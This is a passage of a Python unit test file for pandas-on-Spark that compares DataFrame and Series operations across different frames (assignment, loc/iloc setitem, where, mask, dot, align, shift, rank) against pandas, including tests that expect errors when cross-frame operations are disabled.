psdf = ps.from_pandas(self.pdf5)
pdf = self.pdf5
psdf["c"] = self.psdf6.e
pdf["c"] = self.pdf6.e
self.assert_eq(psdf.sort_index(), pdf.sort_index())
def test_multi_index_assignment_frame(self):
psdf = ps.from_pandas(self.pdf5)
pdf = self.pdf5
psdf[["c"]] = self.psdf5
pdf[["c"]] = self.pdf5
self.assert_eq(psdf.sort_index(), pdf.sort_index())
psdf = ps.from_pandas(self.pdf5)
pdf = self.pdf5
psdf[["x"]] = self.psdf5
pdf[["x"]] = self.pdf5
self.assert_eq(psdf.sort_index(), pdf.sort_index())
psdf = ps.from_pandas(self.pdf6)
pdf = self.pdf6
psdf[["x", "y"]] = self.psdf6
pdf[["x", "y"]] = self.pdf6
self.assert_eq(psdf.sort_index(), pdf.sort_index())
def test_frame_loc_setitem(self):
pdf_orig = pd.DataFrame(
[[1, 2], [4, 5], [7, 8]],
index=["cobra", "viper", "sidewinder"],
columns=["max_speed", "shield"],
)
psdf_orig = ps.DataFrame(pdf_orig)
pdf = pdf_orig.copy()
psdf = psdf_orig.copy()
pser1 = pdf.max_speed
pser2 = pdf.shield
psser1 = psdf.max_speed
psser2 = psdf.shield
another_psdf = ps.DataFrame(pdf_orig)
psdf.loc[["viper", "sidewinder"], ["shield"]] = -another_psdf.max_speed
pdf.loc[["viper", "sidewinder"], ["shield"]] = -pdf.max_speed
self.assert_eq(psdf, pdf)
self.assert_eq(psser1, pser1)
self.assert_eq(psser2, pser2)
pdf = pdf_orig.copy()
psdf = psdf_orig.copy()
pser1 = pdf.max_speed
pser2 = pdf.shield
psser1 = psdf.max_speed
psser2 = psdf.shield
psdf.loc[another_psdf.max_speed < 5, ["shield"]] = -psdf.max_speed
pdf.loc[pdf.max_speed < 5, ["shield"]] = -pdf.max_speed
self.assert_eq(psdf, pdf)
self.assert_eq(psser1, pser1)
self.assert_eq(psser2, pser2)
pdf = pdf_orig.copy()
psdf = psdf_orig.copy()
pser1 = pdf.max_speed
pser2 = pdf.shield
psser1 = psdf.max_speed
psser2 = psdf.shield
psdf.loc[another_psdf.max_speed < 5, ["shield"]] = -another_psdf.max_speed
pdf.loc[pdf.max_speed < 5, ["shield"]] = -pdf.max_speed
self.assert_eq(psdf, pdf)
self.assert_eq(psser1, pser1)
self.assert_eq(psser2, pser2)
def test_frame_iloc_setitem(self):
pdf = pd.DataFrame(
[[1, 2], [4, 5], [7, 8]],
index=["cobra", "viper", "sidewinder"],
columns=["max_speed", "shield"],
)
psdf = ps.DataFrame(pdf)
another_psdf = ps.DataFrame(pdf)
psdf.iloc[[0, 1, 2], 1] = -another_psdf.max_speed
pdf.iloc[[0, 1, 2], 1] = -pdf.max_speed
self.assert_eq(psdf, pdf)
with self.assertRaisesRegex(
ValueError,
"shape mismatch",
):
psdf.iloc[[1, 2], [1]] = -another_psdf.max_speed
psdf.iloc[[0, 1, 2], 1] = 10 * another_psdf.max_speed
pdf.iloc[[0, 1, 2], 1] = 10 * pdf.max_speed
self.assert_eq(psdf, pdf)
with self.assertRaisesRegex(ValueError, "shape mismatch"):
psdf.iloc[[0], 1] = 10 * another_psdf.max_speed
def test_series_loc_setitem(self):
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
pser_another = pd.Series([1, 2, 3], index=["cobra", "viper", "sidewinder"])
psser_another = ps.from_pandas(pser_another)
psser.loc[psser % 2 == 1] = -psser_another
pser.loc[pser % 2 == 1] = -pser_another
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
psser.loc[psser_another % 2 == 1] = -psser
pser.loc[pser_another % 2 == 1] = -pser
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
psser.loc[psser_another % 2 == 1] = -psser
pser.loc[pser_another % 2 == 1] = -pser
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
psser.loc[psser_another % 2 == 1] = -psser_another
pser.loc[pser_another % 2 == 1] = -pser_another
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
psser.loc[["viper", "sidewinder"]] = -psser_another
pser.loc[["viper", "sidewinder"]] = -pser_another
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
psser.loc[psser_another % 2 == 1] = 10
pser.loc[pser_another % 2 == 1] = 10
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
def test_series_iloc_setitem(self):
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
pser1 = pser + 1
psser1 = psser + 1
pser_another = pd.Series([1, 2, 3], index=["cobra", "viper", "sidewinder"])
psser_another = ps.from_pandas(pser_another)
psser.iloc[[0, 1, 2]] = -psser_another
pser.iloc[[0, 1, 2]] = -pser_another
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
with self.assertRaisesRegex(
ValueError,
"cannot set using a list-like indexer with a different length than the value",
):
psser.iloc[[1, 2]] = -psser_another
psser.iloc[[0, 1, 2]] = 10 * psser_another
pser.iloc[[0, 1, 2]] = 10 * pser_another
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
with self.assertRaisesRegex(
ValueError,
"cannot set using a list-like indexer with a different length than the value",
):
psser.iloc[[0]] = 10 * psser_another
psser1.iloc[[0, 1, 2]] = -psser_another
pser1.iloc[[0, 1, 2]] = -pser_another
self.assert_eq(psser1, pser1)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
with self.assertRaisesRegex(
ValueError,
"cannot set using a list-like indexer with a different length than the value",
):
psser1.iloc[[1, 2]] = -psser_another
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
piloc = pser.iloc
kiloc = psser.iloc
kiloc[[0, 1, 2]] = -psser_another
piloc[[0, 1, 2]] = -pser_another
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
with self.assertRaisesRegex(
ValueError,
"cannot set using a list-like indexer with a different length than the value",
):
kiloc[[1, 2]] = -psser_another
kiloc[[0, 1, 2]] = 10 * psser_another
piloc[[0, 1, 2]] = 10 * pser_another
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
with self.assertRaisesRegex(
ValueError,
"cannot set using a list-like indexer with a different length than the value",
):
kiloc[[0]] = 10 * psser_another
def test_update(self):
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [10, 20, 30]})
psdf = ps.from_pandas(pdf)
pser = pdf.x
psser = psdf.x
pser.update(pd.Series([4, 5, 6]))
psser.update(ps.Series([4, 5, 6]))
self.assert_eq(psser.sort_index(), pser.sort_index())
self.assert_eq(psdf.sort_index(), pdf.sort_index())
def test_where(self):
pdf1 = pd.DataFrame({"A": [0, 1, 2, 3, 4], "B": [100, 200, 300, 400, 500]})
pdf2 = pd.DataFrame({"A": [0, -1, -2, -3, -4], "B": [-100, -200, -300, -400, -500]})
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
self.assert_eq(pdf1.where(pdf2 > 100), psdf1.where(psdf2 > 100).sort_index())
pdf1 = pd.DataFrame({"A": [-1, -2, -3, -4, -5], "B": [-100, -200, -300, -400, -500]})
pdf2 = pd.DataFrame({"A": [-10, -20, -30, -40, -50], "B": [-5, -4, -3, -2, -1]})
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
self.assert_eq(pdf1.where(pdf2 < -250), psdf1.where(psdf2 < -250).sort_index())
# multi-index columns
pdf1 = pd.DataFrame({("X", "A"): [0, 1, 2, 3, 4], ("X", "B"): [100, 200, 300, 400, 500]})
pdf2 = pd.DataFrame(
{("X", "A"): [0, -1, -2, -3, -4], ("X", "B"): [-100, -200, -300, -400, -500]}
)
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
self.assert_eq(pdf1.where(pdf2 > 100), psdf1.where(psdf2 > 100).sort_index())
def test_mask(self):
pdf1 = pd.DataFrame({"A": [0, 1, 2, 3, 4], "B": [100, 200, 300, 400, 500]})
pdf2 = pd.DataFrame({"A": [0, -1, -2, -3, -4], "B": [-100, -200, -300, -400, -500]})
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
self.assert_eq(pdf1.mask(pdf2 < 100), psdf1.mask(psdf2 < 100).sort_index())
pdf1 = pd.DataFrame({"A": [-1, -2, -3, -4, -5], "B": [-100, -200, -300, -400, -500]})
pdf2 = pd.DataFrame({"A": [-10, -20, -30, -40, -50], "B": [-5, -4, -3, -2, -1]})
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
self.assert_eq(pdf1.mask(pdf2 > -250), psdf1.mask(psdf2 > -250).sort_index())
# multi-index columns
pdf1 = pd.DataFrame({("X", "A"): [0, 1, 2, 3, 4], ("X", "B"): [100, 200, 300, 400, 500]})
pdf2 = pd.DataFrame(
{("X", "A"): [0, -1, -2, -3, -4], ("X", "B"): [-100, -200, -300, -400, -500]}
)
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
self.assert_eq(pdf1.mask(pdf2 < 100), psdf1.mask(psdf2 < 100).sort_index())
def test_multi_index_column_assignment_frame(self):
pdf = pd.DataFrame({"a": [1, 2, 3, 2], "b": [4.0, 2.0, 3.0, 1.0]})
pdf.columns = pd.MultiIndex.from_tuples([("a", "x"), ("a", "y")])
psdf = ps.DataFrame(pdf)
psdf["c"] = ps.Series([10, 20, 30, 20])
pdf["c"] = pd.Series([10, 20, 30, 20])
psdf[("d", "x")] = ps.Series([100, 200, 300, 200], name="1")
pdf[("d", "x")] = pd.Series([100, 200, 300, 200], name="1")
psdf[("d", "y")] = ps.Series([1000, 2000, 3000, 2000], name=("1", "2"))
pdf[("d", "y")] = pd.Series([1000, 2000, 3000, 2000], name=("1", "2"))
psdf["e"] = ps.Series([10000, 20000, 30000, 20000], name=("1", "2", "3"))
pdf["e"] = pd.Series([10000, 20000, 30000, 20000], name=("1", "2", "3"))
psdf[[("f", "x"), ("f", "y")]] = ps.DataFrame(
{"1": [100000, 200000, 300000, 200000], "2": [1000000, 2000000, 3000000, 2000000]}
)
pdf[[("f", "x"), ("f", "y")]] = pd.DataFrame(
{"1": [100000, 200000, 300000, 200000], "2": [1000000, 2000000, 3000000, 2000000]}
)
self.assert_eq(repr(psdf.sort_index()), repr(pdf))
with self.assertRaisesRegex(KeyError, "Key length \\(3\\) exceeds index depth \\(2\\)"):
psdf[("1", "2", "3")] = ps.Series([100, 200, 300, 200])
def test_series_dot(self):
pser = pd.Series([90, 91, 85], index=[2, 4, 1])
psser = ps.from_pandas(pser)
pser_other = pd.Series([90, 91, 85], index=[2, 4, 1])
psser_other = ps.from_pandas(pser_other)
self.assert_eq(psser.dot(psser_other), pser.dot(pser_other))
psser_other = ps.Series([90, 91, 85], index=[1, 2, 4])
pser_other = pd.Series([90, 91, 85], index=[1, 2, 4])
self.assert_eq(psser.dot(psser_other), pser.dot(pser_other))
# length of index is different
psser_other = ps.Series([90, 91, 85, 100], index=[2, 4, 1, 0])
with self.assertRaisesRegex(ValueError, "matrices are not aligned"):
psser.dot(psser_other)
# for MultiIndex
midx = pd.MultiIndex(
[["lama", "cow", "falcon"], ["speed", "weight", "length"]],
[[0, 0, 0, 1, 1, 1, 2, 2, 2], [0, 1, 2, 0, 1, 2, 0, 1, 2]],
)
pser = pd.Series([45, 200, 1.2, 30, 250, 1.5, 320, 1, 0.3], index=midx)
psser = ps.from_pandas(pser)
pser_other = pd.Series([-450, 20, 12, -30, -250, 15, -320, 100, 3], index=midx)
psser_other = ps.from_pandas(pser_other)
self.assert_eq(psser.dot(psser_other), pser.dot(pser_other))
pser = pd.Series([0, 1, 2, 3])
psser = ps.from_pandas(pser)
# DataFrame "other" without Index/MultiIndex as columns
pdf = pd.DataFrame([[0, 1], [-2, 3], [4, -5], [6, 7]])
psdf = ps.from_pandas(pdf)
self.assert_eq(psser.dot(psdf), pser.dot(pdf))
# DataFrame "other" with Index as columns
pdf.columns = pd.Index(["x", "y"])
psdf = ps.from_pandas(pdf)
self.assert_eq(psser.dot(psdf), pser.dot(pdf))
pdf.columns = pd.Index(["x", "y"], name="cols_name")
psdf = ps.from_pandas(pdf)
self.assert_eq(psser.dot(psdf), pser.dot(pdf))
pdf = pdf.reindex([1, 0, 2, 3])
psdf = ps.from_pandas(pdf)
self.assert_eq(psser.dot(psdf), pser.dot(pdf))
# DataFrame "other" with MultiIndex as columns
pdf.columns = pd.MultiIndex.from_tuples([("a", "x"), ("b", "y")])
psdf = ps.from_pandas(pdf)
self.assert_eq(psser.dot(psdf), pser.dot(pdf))
pdf.columns = pd.MultiIndex.from_tuples(
[("a", "x"), ("b", "y")], names=["cols_name1", "cols_name2"]
)
psdf = ps.from_pandas(pdf)
self.assert_eq(psser.dot(psdf), pser.dot(pdf))
psser = ps.DataFrame({"a": [1, 2, 3], "b": [4, 5, 6]}).b
pser = psser.to_pandas()
psdf = ps.DataFrame({"c": [7, 8, 9]})
pdf = psdf.to_pandas()
self.assert_eq(psser.dot(psdf), pser.dot(pdf))
def test_frame_dot(self):
pdf = pd.DataFrame([[0, 1, -2, -1], [1, 1, 1, 1]])
psdf = ps.from_pandas(pdf)
pser = pd.Series([1, 1, 2, 1])
psser = ps.from_pandas(pser)
self.assert_eq(psdf.dot(psser), pdf.dot(pser))
# Index reorder
pser = pser.reindex([1, 0, 2, 3])
psser = ps.from_pandas(pser)
self.assert_eq(psdf.dot(psser), pdf.dot(pser))
# ser with name
pser.name = "ser"
psser = ps.from_pandas(pser)
self.assert_eq(psdf.dot(psser), pdf.dot(pser))
# df with MultiIndex as column (ser with MultiIndex)
arrays = [[1, 1, 2, 2], ["red", "blue", "red", "blue"]]
pidx = pd.MultiIndex.from_arrays(arrays, names=("number", "color"))
pser = pd.Series([1, 1, 2, 1], index=pidx)
pdf = pd.DataFrame([[0, 1, -2, -1], [1, 1, 1, 1]], columns=pidx)
psdf = ps.from_pandas(pdf)
psser = ps.from_pandas(pser)
self.assert_eq(psdf.dot(psser), pdf.dot(pser))
# df with Index as column (ser with Index)
pidx = pd.Index([1, 2, 3, 4], name="number")
pser = pd.Series([1, 1, 2, 1], index=pidx)
pdf = pd.DataFrame([[0, 1, -2, -1], [1, 1, 1, 1]], columns=pidx)
psdf = ps.from_pandas(pdf)
psser = ps.from_pandas(pser)
self.assert_eq(psdf.dot(psser), pdf.dot(pser))
# df with Index
pdf.index = pd.Index(["x", "y"], name="char")
psdf = ps.from_pandas(pdf)
self.assert_eq(psdf.dot(psser), pdf.dot(pser))
# df with MultiIndex
pdf.index = pd.MultiIndex.from_arrays([[1, 1], ["red", "blue"]], names=("number", "color"))
psdf = ps.from_pandas(pdf)
self.assert_eq(psdf.dot(psser), pdf.dot(pser))
pdf = pd.DataFrame([[1, 2], [3, 4]])
psdf = ps.from_pandas(pdf)
self.assert_eq(psdf.dot(psdf[0]), pdf.dot(pdf[0]))
self.assert_eq(psdf.dot(psdf[0] * 10), pdf.dot(pdf[0] * 10))
self.assert_eq((psdf + 1).dot(psdf[0] * 10), (pdf + 1).dot(pdf[0] * 10))
def test_to_series_comparison(self):
psidx1 = ps.Index([1, 2, 3, 4, 5])
psidx2 = ps.Index([1, 2, 3, 4, 5])
self.assert_eq((psidx1.to_series() == psidx2.to_series()).all(), True)
psidx1.name = "koalas"
psidx2.name = "koalas"
self.assert_eq((psidx1.to_series() == psidx2.to_series()).all(), True)
def test_series_repeat(self):
pser1 = pd.Series(["a", "b", "c"], name="a")
pser2 = pd.Series([10, 20, 30], name="rep")
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
self.assert_eq(psser1.repeat(psser2).sort_index(), pser1.repeat(pser2).sort_index())
def test_series_ops(self):
pser1 = pd.Series([1, 2, 3, 4, 5, 6, 7], name="x", index=[11, 12, 13, 14, 15, 16, 17])
pser2 = pd.Series([1, 2, 3, 4, 5, 6, 7], name="x", index=[11, 12, 13, 14, 15, 16, 17])
pidx1 = pd.Index([10, 11, 12, 13, 14, 15, 16], name="x")
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
psidx1 = ps.from_pandas(pidx1)
self.assert_eq(
(psser1 + 1 + 10 * psser2).sort_index(), (pser1 + 1 + 10 * pser2).sort_index()
)
self.assert_eq(
(psser1 + 1 + 10 * psser2.rename()).sort_index(),
(pser1 + 1 + 10 * pser2.rename()).sort_index(),
)
self.assert_eq(
(psser1.rename() + 1 + 10 * psser2).sort_index(),
(pser1.rename() + 1 + 10 * pser2).sort_index(),
)
self.assert_eq(
(psser1.rename() + 1 + 10 * psser2.rename()).sort_index(),
(pser1.rename() + 1 + 10 * pser2.rename()).sort_index(),
)
self.assert_eq(psser1 + 1 + 10 * psidx1, pser1 + 1 + 10 * pidx1)
self.assert_eq(psser1.rename() + 1 + 10 * psidx1, pser1.rename() + 1 + 10 * pidx1)
self.assert_eq(psser1 + 1 + 10 * psidx1.rename(None), pser1 + 1 + 10 * pidx1.rename(None))
self.assert_eq(
psser1.rename() + 1 + 10 * psidx1.rename(None),
pser1.rename() + 1 + 10 * pidx1.rename(None),
)
self.assert_eq(psidx1 + 1 + 10 * psser1, pidx1 + 1 + 10 * pser1)
self.assert_eq(psidx1 + 1 + 10 * psser1.rename(), pidx1 + 1 + 10 * pser1.rename())
self.assert_eq(psidx1.rename(None) + 1 + 10 * psser1, pidx1.rename(None) + 1 + 10 * pser1)
self.assert_eq(
psidx1.rename(None) + 1 + 10 * psser1.rename(),
pidx1.rename(None) + 1 + 10 * pser1.rename(),
)
pidx2 = pd.Index([11, 12, 13])
psidx2 = ps.from_pandas(pidx2)
with self.assertRaisesRegex(
ValueError, "operands could not be broadcast together with shapes"
):
psser1 + psidx2
with self.assertRaisesRegex(
ValueError, "operands could not be broadcast together with shapes"
):
psidx2 + psser1
def test_index_ops(self):
pidx1 = pd.Index([1, 2, 3, 4, 5], name="x")
pidx2 = pd.Index([6, 7, 8, 9, 10], name="x")
psidx1 = ps.from_pandas(pidx1)
psidx2 = ps.from_pandas(pidx2)
self.assert_eq(psidx1 * 10 + psidx2, pidx1 * 10 + pidx2)
self.assert_eq(psidx1.rename(None) * 10 + psidx2, pidx1.rename(None) * 10 + pidx2)
if LooseVersion(pd.__version__) >= LooseVersion("1.0"):
self.assert_eq(psidx1 * 10 + psidx2.rename(None), pidx1 * 10 + pidx2.rename(None))
else:
self.assert_eq(
psidx1 * 10 + psidx2.rename(None), (pidx1 * 10 + pidx2.rename(None)).rename(None)
)
pidx3 = pd.Index([11, 12, 13])
psidx3 = ps.from_pandas(pidx3)
with self.assertRaisesRegex(
ValueError, "operands could not be broadcast together with shapes"
):
psidx1 + psidx3
pidx1 = pd.Index([1, 2, 3, 4, 5], name="a")
pidx2 = pd.Index([6, 7, 8, 9, 10], name="a")
pidx3 = pd.Index([11, 12, 13, 14, 15], name="x")
psidx1 = ps.from_pandas(pidx1)
psidx2 = ps.from_pandas(pidx2)
psidx3 = ps.from_pandas(pidx3)
self.assert_eq(psidx1 * 10 + psidx2, pidx1 * 10 + pidx2)
if LooseVersion(pd.__version__) >= LooseVersion("1.0"):
self.assert_eq(psidx1 * 10 + psidx3, pidx1 * 10 + pidx3)
else:
self.assert_eq(psidx1 * 10 + psidx3, (pidx1 * 10 + pidx3).rename(None))
def test_align(self):
pdf1 = pd.DataFrame({"a": [1, 2, 3], "b": ["a", "b", "c"]}, index=[10, 20, 30])
pdf2 = pd.DataFrame({"a": [4, 5, 6], "c": ["d", "e", "f"]}, index=[10, 11, 12])
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
for join in ["outer", "inner", "left", "right"]:
for axis in [None, 0]:
psdf_l, psdf_r = psdf1.align(psdf2, join=join, axis=axis)
pdf_l, pdf_r = pdf1.align(pdf2, join=join, axis=axis)
self.assert_eq(psdf_l.sort_index(), pdf_l.sort_index())
self.assert_eq(psdf_r.sort_index(), pdf_r.sort_index())
pser1 = pd.Series([7, 8, 9], index=[10, 11, 12])
pser2 = pd.Series(["g", "h", "i"], index=[10, 20, 30])
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
for join in ["outer", "inner", "left", "right"]:
psser_l, psser_r = psser1.align(psser2, join=join)
pser_l, pser_r = pser1.align(pser2, join=join)
self.assert_eq(psser_l.sort_index(), pser_l.sort_index())
self.assert_eq(psser_r.sort_index(), pser_r.sort_index())
psdf_l, psser_r = psdf1.align(psser1, join=join, axis=0)
pdf_l, pser_r = pdf1.align(pser1, join=join, axis=0)
self.assert_eq(psdf_l.sort_index(), pdf_l.sort_index())
self.assert_eq(psser_r.sort_index(), pser_r.sort_index())
psser_l, psdf_r = psser1.align(psdf1, join=join)
pser_l, pdf_r = pser1.align(pdf1, join=join)
self.assert_eq(psser_l.sort_index(), pser_l.sort_index())
self.assert_eq(psdf_r.sort_index(), pdf_r.sort_index())
# multi-index columns
pdf3 = pd.DataFrame(
{("x", "a"): [4, 5, 6], ("y", "c"): ["d", "e", "f"]}, index=[10, 11, 12]
)
psdf3 = ps.from_pandas(pdf3)
pser3 = pdf3[("y", "c")]
psser3 = psdf3[("y", "c")]
for join in ["outer", "inner", "left", "right"]:
psdf_l, psdf_r = psdf1.align(psdf3, join=join, axis=0)
pdf_l, pdf_r = pdf1.align(pdf3, join=join, axis=0)
self.assert_eq(psdf_l.sort_index(), pdf_l.sort_index())
self.assert_eq(psdf_r.sort_index(), pdf_r.sort_index())
psser_l, psser_r = psser1.align(psser3, join=join)
pser_l, pser_r = pser1.align(pser3, join=join)
self.assert_eq(psser_l.sort_index(), pser_l.sort_index())
self.assert_eq(psser_r.sort_index(), pser_r.sort_index())
psdf_l, psser_r = psdf1.align(psser3, join=join, axis=0)
pdf_l, pser_r = pdf1.align(pser3, join=join, axis=0)
self.assert_eq(psdf_l.sort_index(), pdf_l.sort_index())
self.assert_eq(psser_r.sort_index(), pser_r.sort_index())
psser_l, psdf_r = psser3.align(psdf1, join=join)
pser_l, pdf_r = pser3.align(pdf1, join=join)
self.assert_eq(psser_l.sort_index(), pser_l.sort_index())
self.assert_eq(psdf_r.sort_index(), pdf_r.sort_index())
self.assertRaises(ValueError, lambda: psdf1.align(psdf3, axis=None))
self.assertRaises(ValueError, lambda: psdf1.align(psdf3, axis=1))
def test_pow_and_rpow(self):
pser = pd.Series([1, 2, np.nan])
psser = ps.from_pandas(pser)
pser_other = pd.Series([np.nan, 2, 3])
psser_other = ps.from_pandas(pser_other)
self.assert_eq(pser.pow(pser_other), psser.pow(psser_other).sort_index())
self.assert_eq(pser ** pser_other, (psser ** psser_other).sort_index())
self.assert_eq(pser.rpow(pser_other), psser.rpow(psser_other).sort_index())
def test_shift(self):
pdf = pd.DataFrame(
{
"Col1": [10, 20, 15, 30, 45],
"Col2": [13, 23, 18, 33, 48],
"Col3": [17, 27, 22, 37, 52],
},
index=np.random.rand(5),
)
psdf = ps.from_pandas(pdf)
self.assert_eq(
pdf.shift().loc[pdf["Col1"] == 20].astype(int), psdf.shift().loc[psdf["Col1"] == 20]
)
self.assert_eq(
pdf["Col2"].shift().loc[pdf["Col1"] == 20].astype(int),
psdf["Col2"].shift().loc[psdf["Col1"] == 20],
)
def test_diff(self):
pdf = pd.DataFrame(
{
"Col1": [10, 20, 15, 30, 45],
"Col2": [13, 23, 18, 33, 48],
"Col3": [17, 27, 22, 37, 52],
},
index=np.random.rand(5),
)
psdf = ps.from_pandas(pdf)
self.assert_eq(
pdf.diff().loc[pdf["Col1"] == 20].astype(int), psdf.diff().loc[psdf["Col1"] == 20]
)
self.assert_eq(
pdf["Col2"].diff().loc[pdf["Col1"] == 20].astype(int),
psdf["Col2"].diff().loc[psdf["Col1"] == 20],
)
def test_rank(self):
pdf = pd.DataFrame(
{
"Col1": [10, 20, 15, 30, 45],
"Col2": [13, 23, 18, 33, 48],
"Col3": [17, 27, 22, 37, 52],
},
index=np.random.rand(5),
)
psdf = ps.from_pandas(pdf)
self.assert_eq(pdf.rank().loc[pdf["Col1"] == 20], psdf.rank().loc[psdf["Col1"] == 20])
self.assert_eq(
pdf["Col2"].rank().loc[pdf["Col1"] == 20], psdf["Col2"].rank().loc[psdf["Col1"] == 20]
)
class OpsOnDiffFramesDisabledTest(PandasOnSparkTestCase, SQLTestUtils):
@classmethod
def setUpClass(cls):
super().setUpClass()
set_option("compute.ops_on_diff_frames", False)
@classmethod
def tearDownClass(cls):
reset_option("compute.ops_on_diff_frames")
super().tearDownClass()
@property
def pdf1(self):
return pd.DataFrame(
{"a": [1, 2, 3, 4, 5, 6, 7, 8, 9], "b": [4, 5, 6, 3, 2, 1, 0, 0, 0]},
index=[0, 1, 3, 5, 6, 8, 9, 9, 9],
)
@property
def pdf2(self):
return pd.DataFrame(
{"a": [9, 8, 7, 6, 5, 4, 3, 2, 1], "b": [0, 0, 0, 4, 5, 6, 1, 2, 3]},
index=list(range(9)),
)
@property
def psdf1(self):
return ps.from_pandas(self.pdf1)
@property
def psdf2(self):
return ps.from_pandas(self.pdf2)
def test_arithmetic(self):
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
self.psdf1.a - self.psdf2.b
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
self.psdf1.a - self.psdf2.a
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
self.psdf1["a"] - self.psdf2["a"]
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
self.psdf1 - self.psdf2
def test_assignment(self):
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psdf = ps.from_pandas(self.pdf1)
psdf["c"] = self.psdf1.a
def test_frame_loc_setitem(self):
pdf = pd.DataFrame(
[[1, 2], [4, 5], [7, 8]],
index=["cobra", "viper", "sidewinder"],
columns=["max_speed", "shield"],
)
psdf = ps.DataFrame(pdf)
another_psdf = ps.DataFrame(pdf)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psdf.loc[["viper", "sidewinder"], ["shield"]] = another_psdf.max_speed
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psdf.loc[another_psdf.max_speed < 5, ["shield"]] = -psdf.max_speed
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psdf.loc[another_psdf.max_speed < 5, ["shield"]] = -another_psdf.max_speed
def test_frame_iloc_setitem(self):
pdf = pd.DataFrame(
[[1, 2], [4, 5], [7, 8]],
index=["cobra", "viper", "sidewinder"],
columns=["max_speed", "shield"],
)
psdf = ps.DataFrame(pdf)
another_psdf = ps.DataFrame(pdf)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psdf.iloc[[1, 2], [1]] = another_psdf.max_speed.iloc[[1, 2]]
def test_series_loc_setitem(self):
pser = pd.Series([1, 2, 3], index=["cobra", "viper", "sidewinder"])
psser = ps.from_pandas(pser)
pser_another = pd.Series([1, 2, 3], index=["cobra", "viper", "sidewinder"])
psser_another = ps.from_pandas(pser_another)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psser.loc[psser % 2 == 1] = -psser_another
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psser.loc[psser_another % 2 == 1] = -psser
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psser.loc[psser_another % 2 == 1] = -psser_another
def test_series_iloc_setitem(self):
pser = pd.Series([1, 2, 3], index=["cobra", "viper", "sidewinder"])
psser = ps.from_pandas(pser)
pser_another = pd.Series([1, 2, 3], index=["cobra", "viper", "sidewinder"])
psser_another = ps.from_pandas(pser_another)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psser.iloc[[1]] = -psser_another.iloc[[1]]
def test_where(self):
pdf1 = pd.DataFrame({"A": [0, 1, 2, 3, 4], "B": [100, 200, 300, 400, 500]})
